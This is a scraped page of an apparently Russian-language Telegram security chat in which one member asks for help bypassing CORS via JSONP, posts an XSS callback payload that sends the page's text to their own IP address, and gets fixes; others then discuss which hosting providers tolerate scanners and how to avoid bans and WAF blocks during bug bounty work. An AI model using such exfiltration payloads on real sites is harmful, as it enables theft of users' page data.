В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

1262 membersпожаловаться на группу
2021 January 27

I

IceCream time 🍧🍧🍧... in WebPwnChat
Привет. Пытаюсь обойти cors черещ jsonp. Мне нужно отправить текст страницы к себе на сервер.  и такая вот проблема: В текст есть переносы строк.. убрать регуляркой не представляется возможным их. А закодировать текст btoa выходит только первая строчка - до переноса строки.. может накидаете подсказку?
источник
15:54пожаловаться#1

I

IceCream time 🍧🍧🍧... in WebPwnChat
callback=window.location.replace('http://1.1.1.4/'.concat(btoa(document.body.innerText)))%3E%3C/script%3Eg
источник
15:55пожаловаться#2

I

IceCream time 🍧🍧🍧... in WebPwnChat
slice тоже не видит текст до переноса строки.
источник
15:56пожаловаться#3

A

Anton in WebPwnChat
innerHTML попробовать?
источник
15:57пожаловаться#4

А

Алексей in WebPwnChat
IceCream time 🍧🍧🍧
slice тоже не видит текст до переноса строки.
Посмотри в консоли что с обьектом innertext, может это массив и берется первый элемент?
источник
15:57пожаловаться#5

I

IceCream time 🍧🍧🍧... in WebPwnChat
О кажется innerHTML помог. Спасибо)
источник
15:59пожаловаться#6

I

IceCream time 🍧🍧🍧... in WebPwnChat
хех, оказалось текст, который нужно украсть, находится после того места,  в который я вставляю js с колбэком. И приходит мне только текст до этого места) Пробовал на alert(1). Текст, который после <script>, начинает отображаться тоьлко после того как нажму ОК в браузере ..
источник
16:25пожаловаться#7

B

Betel'gejze in WebPwnChat
Тема серверов изьезжена вдоль и поперек, но вечно актуальна 😂.          

Кто участвует в bug bounty и пользуется сканерами - отзовитесь пожалуйста, какова вероятность словить бан в OVH, DO и vultr от работы acunetix, netsparker и прочих сканеров? В случае бана, если предоставить пруфы, что в программу есть приглашение, какова вероятность разбана?

Спасибо заранее 😺
источник
16:27пожаловаться#8

᠌᠌Sh1Yo in WebPwnChat
Betel'gejze
Тема серверов изьезжена вдоль и поперек, но вечно актуальна 😂.          

Кто участвует в bug bounty и пользуется сканерами - отзовитесь пожалуйста, какова вероятность словить бан в OVH, DO и vultr от работы acunetix, netsparker и прочих сканеров? В случае бана, если предоставить пруфы, что в программу есть приглашение, какова вероятность разбана?

Спасибо заранее 😺
Почему бы в саппорт этих сервисов не обратиться и не спросить про бб
источник
16:29пожаловаться#9

B

Betel'gejze in WebPwnChat
Наверное так и придётся сделать, просто интересно собрать статистику у комьюнити если кто откликется.

Я написал наиболее известные сервисы, но их то больше, может быть, кто то знает идеально подходящие предложения на рынке для white hat исследований.
источник
16:36пожаловаться#10

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
Betel'gejze
Тема серверов изьезжена вдоль и поперек, но вечно актуальна 😂.          

Кто участвует в bug bounty и пользуется сканерами - отзовитесь пожалуйста, какова вероятность словить бан в OVH, DO и vultr от работы acunetix, netsparker и прочих сканеров? В случае бана, если предоставить пруфы, что в программу есть приглашение, какова вероятность разбана?

Спасибо заранее 😺
тут где-то писали уже, что на некоторых сервисах за портскан сразу блочат
источник
16:47пожаловаться#11

КН

Кирилл Николаев... in WebPwnChat
я пользуюсь hostens-блокировали 2 раза,оба раза после моего письма в тех поддержку разблокировали
источник
16:50пожаловаться#12

1

1.4.7/12 in WebPwnChat
Betel'gejze
Тема серверов изьезжена вдоль и поперек, но вечно актуальна 😂.          

Кто участвует в bug bounty и пользуется сканерами - отзовитесь пожалуйста, какова вероятность словить бан в OVH, DO и vultr от работы acunetix, netsparker и прочих сканеров? В случае бана, если предоставить пруфы, что в программу есть приглашение, какова вероятность разбана?

Спасибо заранее 😺
Бери Zomro. У меня там nmap 25 часов в сутки, 8 дней в неделю сканирует.
источник
17:09пожаловаться#13

1

1.4.7/12 in WebPwnChat
И цены такие, что дешевле только даром. И саппорт адекватный
источник
17:10пожаловаться#14

GD

Green Dog in WebPwnChat
Тут ещё важный момент, что порт скан это подозрительная активность, а окунь - не очень. Главное, чтобы абузы не прилетали
источник
17:10пожаловаться#15

А

Алексей in WebPwnChat
Green Dog
Тут ещё важный момент, что порт скан это подозрительная активность, а окунь - не очень. Главное, чтобы абузы не прилетали
Окунь - разброс цве и брут директорий - не очень?)
источник
17:10пожаловаться#16

А

Алексей in WebPwnChat
1.4.7/12
Бери Zomro. У меня там nmap 25 часов в сутки, 8 дней в неделю сканирует.
Мне банили, датацентр у котрого хостится зомро сказал - уходите, мы вам не рады

При этом там один нмап был
источник
17:11пожаловаться#17

1

1.4.7/12 in WebPwnChat
У меня тоже чисто рекон сканеры типа саблистер, ффуф и пр. Пока всё норм. При чем порой нагружаю до предела
источник
17:12пожаловаться#18

ES

Evgeniy Slezhuk in WebPwnChat
Алексей
Окунь - разброс цве и брут директорий - не очень?)
если в ssl завернуто, то со стороны хостера это обычный траф на tcp/443. сканирование на сетевом уровне гораздо заметнее.
источник
17:14пожаловаться#19

B

Betel'gejze in WebPwnChat
Спасибо огромное откликнувшимся! В продолжении дискуссии - а по облачным сервисам есть какая то статистика?  Вопрос связан с тем, что если BugBounty программа под защитой WAF, то IPv4 регулярно банятся самим WAFом и в облаке это решается несколькими кликами, а на VPS/VDS обычно все сложнее.
источник
17:19пожаловаться#20